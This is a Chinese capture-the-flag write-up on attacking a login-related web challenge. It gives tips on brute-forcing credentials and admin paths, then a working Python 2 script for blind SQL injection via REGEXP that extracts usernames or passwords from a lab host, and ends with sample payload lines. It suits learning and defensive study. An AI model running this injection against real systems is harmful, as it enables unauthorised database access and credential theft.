CTF web题总结--爆破用户名密码

1、burp爆破用户名密码
2、id,userid,useId多试几次
3、爆破后台目录,index.php,users.php,login.php,flag.php
4、脚本:

# -*- coding:utf-8 -*-
import httplib
import re
import urllib

class Attacker:
    """Boolean-based blind extraction of one column value through a SQL REGEXP injection.

    Each probe appends ``' or <column> regexp '^<prefix><c>' #`` to the target
    URL, sends a GET over plain HTTP and treats the marker string ``useless`` in
    the response body as "the regex matched"; the value is rebuilt one
    character at a time from that oracle.  From the defender's side, the query
    behind ``userId`` presumably concatenates the parameter into SQL text --
    parameterized statements (or rejecting a non-numeric ``userId``) remove the
    condition this depends on, and the request pattern (a burst of GETs from
    one client whose ``userId`` value differs only in the trailing regex
    suffix) is what access-log review or a WAF rule would likely surface.
    """

    def __init__(self, mode, url):
        """Store the target and build the candidate alphabet.

        mode: 1 probes the ``username`` column, 2 the ``password`` column
              (any other value leaves ``aim`` unbound inside ``crack``).
        url:  full URL including the injectable parameter, e.g. the
              ``users.php?userId=2`` form used in ``main``.
        """

        self.url = url
        self.domin = self.get_domin()
        self.mode = mode
        # Candidate alphabet: a-z, then A-Z, then 0-9.  The order matters:
        # ``crack`` treats finishing a pass on '9' without a match as "no more characters".
        str1 = []
        for i in range(26):
            str1.append(chr(ord('a') + i))
        for i in range(26):
            str1.append(chr(ord('A') + i))
        for i in range(10):
            str1.append(chr(ord('0') + i))
        self.str_box = str1

    def get_domin(self):
        """Return the host[:port] part of ``self.url`` (name kept as spelled; callers use it).

        Splits on ``://``: a scheme starting with ``http`` (so ``https`` too)
        is dropped, otherwise the whole string is taken as scheme-less.  Two
        things to know: a scheme-less host whose name itself begins with
        ``http`` raises IndexError here (``url_a`` then has one element), and
        ``crack`` always opens a plain ``HTTPConnection`` to this value, so an
        ``https://`` URL is still probed over cleartext HTTP (port 80 unless
        the URL carries an explicit port).
        """
        url = self.url
        url_a = url.split('://')
        if re.match('^http',url_a[0]):

            url = url_a[1]
        else:
            url = url_a[0]
        url_a = url.split('/')
        domin = url_a[0]
        return domin

    def crack(self):
        """Recover the chosen column value character by character into ``self.name``.

        Sends one GET per candidate character on a single reused connection;
        a response body containing ``useless`` extends the recovered prefix
        (the ``> 0`` test misses an occurrence at offset 0, where ``find``
        returns 0).  Stops after a full pass over the alphabet with no match.
        The bare ``except`` at the end swallows every error, including
        ``KeyboardInterrupt``, so a ``mode`` other than 1 or 2 -- which leaves
        ``aim`` unbound -- only prints "Something Wrong".  ``self.name`` is
        assigned only on the success path.
        """
        conn = httplib.HTTPConnection(self.domin)
        # Column to extract; only modes 1 and 2 bind ``aim``.
        if self.mode == 1:
            aim = 'username'
        if self.mode == 2:
            aim = 'password'
        url = self.url
        # The two URL-encoded halves around the growing regex:
        # "' or <aim> regexp '"  ...  "' #"
        attack_url1 = urllib.quote('\' or ' + aim + ' regexp \'')
        attack_url2 = urllib.quote('\' #')
        str_box = self.str_box

        try:
            string = '^'  # anchored regex prefix; the leading '^' is stripped on output
            while True:
                for str_end in str_box:
                    # The regex text itself is not URL-encoded; only '^' and
                    # [A-Za-z0-9] ever appear in it, so that is harmless here.
                    url_to_attack = url + attack_url1 + string + str_end + attack_url2 
                    #print url_to_attack
                    conn.request(method="GET", url=url_to_attack)
                    response = conn.getresponse()
                    res = response.read()
                    if res.find('useless') > 0:
                        string = string + str_end
                        str_end = -1  # flag "matched" for the check after the for loop
                        print string[1:] # progress: prefix recovered so far (original note: uncomment to watch progress)
                        break
                # A pass that ends on the last alphabet entry ('9') without a
                # match means no further character exists.  The ``!= -1`` clause
                # is redundant with ``== '9'``.
                if str_end != -1 and str_end == '9': 
                    break


            self.name = string
            print self.name[1:]

        except:
            print "Something Wrong"
            print url

def main():
    """Entry point: run a password-column probe (mode 2) against the hard-coded lab URL."""
    # mode 1 = username column, mode 2 = password column
    Attacker(2, 'http://10.200.91.28/zebCTF/users.php?userId=2').crack()

if __name__ == '__main__':
    # Run the probe only when executed as a script, not when imported.
    main()

正则注入

userId=2%27%20or username REGEXP '^A' %23
userId=2%27%20or username REGEXP '^a' %23
userId=2%27%20or username REGEXP '^Z' %23
